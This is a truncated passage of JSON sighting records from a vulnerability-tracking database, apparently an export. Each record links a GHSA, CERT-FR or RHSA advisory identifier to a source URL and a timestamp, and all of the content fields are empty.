"creation_timestamp": "2026-02-26T16:10:19.000000Z"}, {"uuid": "3da9b271-0a8d-4e78-b1d7-058d2c68e24d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3F2-MCXC-PWJX", "type": "seen", "source": "https://gist.github.com/alon710/1e84c2453d7b89234084625565fb6ff9", "content": "", "creation_timestamp": "2026-02-26T16:40:19.000000Z"}, {"uuid": "5644eef9-5568-4c8b-8103-56d47716f0df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w789-49fc-v8hr", "type": "seen", "source": "https://gist.github.com/alon710/a4074481ed41397386883152fdafa841", "content": "", "creation_timestamp": "2026-02-26T17:10:19.000000Z"}, {"uuid": "75c3e0b3-c6eb-414a-a5fa-ec6911e14975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-24p2-j2jr-386w", "type": "seen", "source": "https://gist.github.com/alon710/86084afa327f20c292a025302a0df17a", "content": "", "creation_timestamp": "2026-02-26T17:40:19.000000Z"}, {"uuid": "993ccbbe-90e7-435e-9fd0-58143af0ff38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mpf7-p9x7-96r3", "type": "seen", "source": "https://gist.github.com/alon710/e74bfaa6d377221316be43675ce67d75", "content": "", "creation_timestamp": "2026-02-26T18:10:19.000000Z"}, {"uuid": "1413db9b-3848-421c-a981-66f11d2df51e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjqx-cfc4-9h6v", "type": "seen", "source": "https://gist.github.com/alon710/214c51c2b140b0765dc952592c76eb78", "content": "", "creation_timestamp": "2026-02-26T18:40:19.000000Z"}, {"uuid": "3592f884-fb4d-4671-9e01-20dc5892dc57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mjf5-7g4m-gx5w", "type": "seen", "source": "https://gist.github.com/alon710/09463d4ff783b0368066b3726e657169", "content": "", "creation_timestamp": "2026-02-26T19:10:19.000000Z"}, {"uuid": "d28736e9-dde4-4a0a-aa56-09c0533255b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2p9h-rqjw-gm92", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-176", "content": "", "creation_timestamp": "2026-02-26T18:09:12.000000Z"}, {"uuid": "74dcfdd3-ac4c-46cc-aff7-e601e90ef9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-75g8-rv7v-32f7", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-176", "content": "", "creation_timestamp": "2026-02-26T18:09:12.000000Z"}, {"uuid": "b9d0e6fe-f506-4192-86e9-88cfbbfa207d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jjpj-p2wh-qf23", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-176", "content": "", "creation_timestamp": "2026-02-26T18:09:12.000000Z"}, {"uuid": "075902b6-b8a6-4167-b358-8aba5291ce25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vpcf-gvg4-6qwr", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-176", "content": "", "creation_timestamp": "2026-02-26T18:09:12.000000Z"}, {"uuid": "b4817f2d-422d-43ee-8369-de6b2b8d0059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wxx7-mcgf-j869", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-176", "content": "", "creation_timestamp": "2026-02-26T18:09:12.000000Z"}, {"uuid": "2c37338b-8a3e-403f-b417-2385d2220ea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rc7-2jj6-mp64", "type": "seen", "source": "https://gist.github.com/alon710/db177992ad587ae21d2ec8067685c1a5", "content": "", "creation_timestamp": "2026-02-26T20:10:19.000000Z"}, {"uuid": "e7134009-9a51-432b-b547-502fc02d05fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x7hp-r3qg-r3cj", "type": "seen", "source": "https://gist.github.com/alon710/46cb981f7572074584ce82b41bf22f76", "content": "", "creation_timestamp": "2026-02-26T20:40:19.000000Z"}, {"uuid": "4424d81f-bcdc-4721-9b18-0e5198f034c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r5mx-6wc6-7h9w", "type": "seen", "source": "https://gist.github.com/alon710/542919c9baa74ad65aba77993c4f58c9", "content": "", "creation_timestamp": "2026-02-26T21:10:19.000000Z"}, {"uuid": "d5ff9d79-db75-48a5-bc44-a5b74f47a00a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2v6m-6xw3-6467", "type": "seen", "source": "https://gist.github.com/alon710/bad531f82cc706181325efcbc0815907", "content": "", "creation_timestamp": "2026-02-26T21:40:19.000000Z"}, {"uuid": "7e7c002f-4a07-4c41-82b3-076e49cab9f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wppc-7cq7-cgfv", "type": "seen", "source": "https://gist.github.com/alon710/3876c0d5d37ba696379319dc0ea4cb02", "content": "", "creation_timestamp": "2026-02-26T22:10:19.000000Z"}, {"uuid": "ae01fb71-7b73-4096-bf07-1e29aa7379d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qgvg-pr8v-6rr3", "type": "seen", "source": "https://gist.github.com/alon710/b41531a5b724bfdcc375b017f3f74a89", "content": "", "creation_timestamp": "2026-02-26T22:40:19.000000Z"}, {"uuid": "e7419bfc-c9dd-467d-afcd-818f17ddb7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8g8j-r87h-p36x", "type": "seen", "source": "https://gist.github.com/alon710/698e47d7e7b029f09315d51259967445", "content": "", "creation_timestamp": "2026-02-26T23:10:18.000000Z"}, {"uuid": "903e58c0-a3b7-4f28-80d0-f822755551a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-465p-v42x-3fmj", "type": "seen", "source": "https://gist.github.com/alon710/77c90a6d7885e90425dd74c2a65f9f75", "content": "", "creation_timestamp": "2026-02-26T23:40:19.000000Z"}, {"uuid": "61657d7e-db14-44fb-bf02-d58bb1121eeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gj6x-q8rh-wj6x", "type": "seen", "source": "https://gist.github.com/alon710/8f17f9c15768fb9e715dace4af33516b", "content": "", "creation_timestamp": "2026-02-27T00:10:19.000000Z"}, {"uuid": "52d89151-db85-4f6e-bf2c-dce5859e2e9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-38C7-23HJ-2WGQ", "type": "seen", "source": "https://gist.github.com/alon710/2b47423cec6eddc2fceeb701acd589b2", "content": "", "creation_timestamp": "2026-02-27T00:40:19.000000Z"}, {"uuid": "8fb15e58-a636-45a4-83bc-70dda80a3b30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvfv-ppw4-7h2w", "type": "seen", "source": "https://gist.github.com/alon710/324f0d8743d524ea3c5fd57dce49e9e6", "content": "", "creation_timestamp": "2026-02-27T01:10:18.000000Z"}, {"uuid": "3471d946-faab-4a29-9622-1e08e4ce0abe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FVFV-PPW4-7H2W", "type": "seen", "source": "https://bsky.app/profile/LLMs.activitypub.awakari.com.ap.brid.gy/post/3mfskhw4scnr2", "content": "", "creation_timestamp": "2026-02-27T01:25:17.477698Z"}, {"uuid": "6958bbe2-11c3-4151-a86d-71e3f5a92663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-fvfv-ppw4-7h2w", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfskqlk4eu2s", "content": "", "creation_timestamp": "2026-02-27T01:30:03.843702Z"}, {"uuid": "43fb6625-fba3-4718-bb54-128c4e94298b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JH8H-6C9Q-7GMW", "type": "seen", "source": "https://gist.github.com/alon710/c0095b0ad4a6fd43c1592021bdf2e7f5", "content": "", "creation_timestamp": "2026-02-27T01:40:18.000000Z"}, {"uuid": "7979d848-adce-4fb3-b885-9cfda0c5a27d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-jh8h-6c9q-7gmw", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfsm4ebfwr2b", "content": "", "creation_timestamp": "2026-02-27T01:54:32.317727Z"}, {"uuid": "f05a46ac-e9f6-426f-adf2-d7b2f91b86ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VJF3-2GPJ-233V", "type": "seen", "source": "https://gist.github.com/alon710/ebc773370e1f1607b2bfdb1617822e65", "content": "", "creation_timestamp": "2026-02-27T02:10:20.000000Z"}, {"uuid": "5e0aa826-55da-4932-9b2c-f63749c9887d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7gcc-r8m5-44qm", "type": "seen", "source": "https://gist.github.com/alon710/9c24edd6758ed34c527e00be66673a79", "content": "", "creation_timestamp": "2026-02-27T02:40:18.000000Z"}, {"uuid": "f5257cb5-1711-4275-affe-bda3d123e9f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62cr-6wp5-q43h", "type": "seen", "source": "https://gist.github.com/alon710/5a2e5affef6dd7e5863b811b8e50c918", "content": "", "creation_timestamp": "2026-02-27T03:10:18.000000Z"}, {"uuid": "90f8c001-541c-4e1c-b617-d3cc9dd620a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wxx7-mcgf-j869", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mfsrjdyb6j2d", "content": "", "creation_timestamp": "2026-02-27T03:31:16.946025Z"}, {"uuid": "07ace95e-8da8-4558-84bb-8200dc40eb71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fj3w-jwp8-x2g3", "type": "seen", "source": "https://gist.github.com/alon710/a27d67a44ac5804fb1959c01e9c562d6", "content": "", "creation_timestamp": "2026-02-27T03:40:19.000000Z"}, {"uuid": "c559da20-bddc-4bc9-80e6-474929b5c5da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3645-fxcv-hqr4", "type": "seen", "source": "https://gist.github.com/alon710/bbb2b9f63be691f9cd5588ec4822d51e", "content": "", "creation_timestamp": "2026-02-27T04:00:18.000000Z"}, {"uuid": "d70a649b-9795-4a66-a0a5-10baa950740a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-phwv-c562-gvmh", "type": "seen", "source": "https://gist.github.com/alon710/bd389c3761f00f62851a6d5cd2e46410", "content": "", "creation_timestamp": "2026-02-27T04:10:19.000000Z"}, {"uuid": "c522b5f9-ee58-4c09-8e5a-caefb0695e26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rmx-256w-8mj9", "type": "seen", "source": "https://gist.github.com/alon710/0d260fd55b7736ebaf5b86e89cb62237", "content": "", "creation_timestamp": "2026-02-27T04:40:18.000000Z"}, {"uuid": "d3e969d6-d45b-4961-a339-592902ae6353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wvj2-96wp-fq3f", "type": "seen", "source": "https://gist.github.com/alon710/69aa4a4739e67bd07fef8e710308767b", "content": "", "creation_timestamp": "2026-02-27T05:10:18.000000Z"}, {"uuid": "216e7f77-9134-464e-8c54-b61e5e1b8e87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g8gc-6c4h-jg86", "type": "seen", "source": "https://gist.github.com/alon710/5824d9b6db63c17fd0a504d93c2d1716", "content": "", "creation_timestamp": "2026-02-27T05:40:18.000000Z"}, {"uuid": "88429c68-ced6-4406-86c6-121c344a3253", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42cr-w2gr-m54q", "type": "seen", "source": "https://gist.github.com/alon710/87a9eaadd5362fd30512683dd9901643", "content": "", "creation_timestamp": "2026-02-27T06:10:18.000000Z"}, {"uuid": "1ba29a54-3174-474e-86e2-efee62914447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w8j3-qvc3-h56f", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mjtgake2o22p", "content": "", "creation_timestamp": "2026-04-19T07:22:56.535185Z"}, {"uuid": "82ba6bf7-7630-4a63-a384-cc8cc118e1a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-012", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116278978230489798", "content": "", "creation_timestamp": "2026-03-23T14:33:23.690588Z"}, {"uuid": "3631a0ff-b2a2-42c3-8420-62098f27fd42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-012", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mhqbpels6z2c", "content": "", "creation_timestamp": "2026-03-23T14:33:22.494245Z"}, {"uuid": "a899c65f-fea2-45ed-a907-8400f445cbbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-012", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mhqujd5kmd2p", "content": "", "creation_timestamp": "2026-03-23T20:10:00.690804Z"}, {"uuid": "283146d0-7ce1-4832-9662-6a450526e227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wjr5-c57x-95m2", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/116296309675649424", "content": "", "creation_timestamp": "2026-03-26T16:00:59.049293Z"}, {"uuid": "4af8ab34-1fa9-48d5-89e9-ebe1c9c1924a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m4pc-p4q3-4c7j", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/116296309675649424", "content": "", "creation_timestamp": "2026-03-26T16:00:58.963904Z"}, {"uuid": "1f008eda-6100-463e-bcca-0b888abc1616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69fq-xp46-6x23", "type": "seen", "source": "https://bsky.app/profile/ArneBab.rollenspiel.social.ap.brid.gy/post/3mhyggxxknms2", "content": "", "creation_timestamp": "2026-03-26T20:19:32.528954Z"}, {"uuid": "6dd1e9ed-ee3c-47a4-bc4f-79e42918ae71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cpgw-wgf3-xc6v", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mhyivdkgzk2t", "content": "", "creation_timestamp": "2026-03-26T21:03:16.841578Z"}, {"uuid": "298a72b9-f749-4a0d-bc3e-3b798e9c5716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69fq-xp46-6x23", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/aqua-security-security-advisory-av26-283", "content": "", "creation_timestamp": "2026-03-26T18:20:45.000000Z"}, {"uuid": "a53a0bdc-0c11-415a-bb2c-c119aa985053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-84p4-hcx7-jj7c", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/squid-security-advisory-av26-284", "content": "", "creation_timestamp": "2026-03-26T18:14:49.000000Z"}, {"uuid": "70b257b0-4aa6-4363-a008-7f51e599cb24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f9p7-3jqg-hhvq", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/squid-security-advisory-av26-284", "content": "", "creation_timestamp": "2026-03-26T18:14:49.000000Z"}, {"uuid": "134a9c90-386e-4cd3-91cc-95d50bed7c0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hpfx-h48q-gvwg", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/squid-security-advisory-av26-284", "content": "", "creation_timestamp": "2026-03-26T18:14:49.000000Z"}, {"uuid": "422126fc-6c92-439f-a672-5b92f1f039ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mc3p-mq2p-xw6v", "type": "seen", "source": "http://takeonme.org/cves/cve-2026-4946/", "content": "", "creation_timestamp": "2026-03-25T16:55:00.000000Z"}, {"uuid": "11309702-cbb5-4238-85aa-980bf06550de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rj88-6mr5-rcw8", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/19c15eba-7fb7-4f1e-8fdd-f5871d05e797", "content": "", "creation_timestamp": "2024-09-30T07:31:43.981846Z"}, {"uuid": "428ebbd4-9f49-4027-95ab-5c4388a94434", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7xfx-47qg-grp6", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/19c15eba-7fb7-4f1e-8fdd-f5871d05e797", "content": "", "creation_timestamp": "2024-09-30T07:31:43.981846Z"}, {"uuid": "9b9cbf3b-3338-4815-8330-c5a42a000380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p9rh-jxmq-gq47", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/19c15eba-7fb7-4f1e-8fdd-f5871d05e797", "content": "", "creation_timestamp": "2024-09-30T07:31:43.981846Z"}, {"uuid": "419ce383-5783-4a57-ad54-e196799b6163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w63j-6g73-wmg5", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/19c15eba-7fb7-4f1e-8fdd-f5871d05e797", "content": "", "creation_timestamp": "2024-09-30T07:31:43.981846Z"}, {"uuid": "b5994cbd-4e1c-4c90-9316-7a4f69f84841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-013", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116318553525388674", "content": "", "creation_timestamp": "2026-03-30T14:18:00.482876Z"}, {"uuid": "cab485b5-7f57-4352-8be9-591e4ac648f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-013", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mibu44vvge2o", "content": "", "creation_timestamp": "2026-03-30T14:17:53.631343Z"}, {"uuid": "1d655f70-5fa4-44c6-bce4-145e1c84af92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2gmj-rpqf-pxvh", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mibumrc34ex2", "content": "", "creation_timestamp": "2026-03-30T14:27:19.431824Z"}, {"uuid": "ae8ba297-5a20-4776-a318-46e4d827f57f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2026:2984", "type": "seen", "source": "https://gist.github.com/fao89/0ef4daafb58f204bb3f4b9361f75d68c", "content": "", "creation_timestamp": "2026-03-30T14:35:01.000000Z"}, {"uuid": "7d1ba818-bca1-462b-98cb-22e5245440e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2026:3402", "type": "seen", "source": "https://gist.github.com/fao89/0ef4daafb58f204bb3f4b9361f75d68c", "content": "", "creation_timestamp": "2026-03-30T14:35:01.000000Z"}, {"uuid": "f5b8294c-c0d8-4d93-bddb-c88dba316b4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2026:2984", "type": "seen", "source": "https://gist.github.com/fao89/ce009677a07abdc70b85a5ec1d9a9b85", "content": "", "creation_timestamp": "2026-03-30T14:50:35.000000Z"}, {"uuid": "3a2961ff-6770-4b5b-8e31-590832b904a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2026:3402", "type": "seen", "source": "https://gist.github.com/fao89/ce009677a07abdc70b85a5ec1d9a9b85", "content": "", "creation_timestamp": "2026-03-30T14:50:35.000000Z"}, {"uuid": "b53896d7-d1bc-42ae-83e4-f0a82ffc861f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69fq-xp46-6x23", "type": "seen", "source": "https://bsky.app/profile/juuh42dias.bsky.social/post/3michrskie22x", "content": "", "creation_timestamp": "2026-03-30T20:10:06.363463Z"}, {"uuid": "0cb5aebd-cfa7-47c6-ad5d-5fd004c0eeb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rh2x-ccvw-q7r3", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3micnynohb625", "content": "", "creation_timestamp": "2026-03-30T22:01:14.170495Z"}, {"uuid": "15daaa37-ad3a-47e4-9b60-b615fd7ea4df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3mfm-83xf-c92r", "type": "seen", "source": "https://gist.github.com/duard/9050043d2c682a90a7a5815d1d985bac", "content": "", "creation_timestamp": "2026-03-30T21:51:08.000000Z"}, {"uuid": "7c0b5f06-77a3-42df-be67-398ce33134ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2qvq-rjwj-gvw9", "type": "seen", "source": "https://gist.github.com/duard/9050043d2c682a90a7a5815d1d985bac", "content": "", "creation_timestamp": "2026-03-30T21:51:08.000000Z"}, {"uuid": "dcfb05a1-bd6a-474b-b614-5b6fa8cb230b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-43fc-jf86-j433", "type": "seen", "source": "https://gist.github.com/nathan815/a203abbe4dc9e08de6d9c9cf04900d0f", "content": "", "creation_timestamp": "2026-03-31T03:36:57.000000Z"}, {"uuid": "4377d2fd-3bfd-459f-92b0-e441b6a55a13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-43fc-jf86-j433", "type": "seen", "source": "https://gist.github.com/nathan815/3b2baf96f65648664c6b5bb0a19da82c", "content": "", "creation_timestamp": "2026-03-31T04:27:44.000000Z"}, {"uuid": "276e89f6-a58f-4aa5-915c-2f553431c90c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9wv-8m72-gc7v", "type": "seen", "source": "https://gist.github.com/sgInnora/1881b930d06973834faf1f59e2e2e2ac", "content": "", "creation_timestamp": "2026-04-02T07:35:25.000000Z"}, {"uuid": "24ba0fb0-5a23-4402-8d24-8f62959264d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h4mf-vg97-hj8j", "type": "seen", "source": "https://gist.github.com/sgInnora/1881b930d06973834faf1f59e2e2e2ac", "content": "", "creation_timestamp": "2026-04-02T07:35:25.000000Z"}, {"uuid": "db8749f6-e999-4fff-8baf-bc7a9840eed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 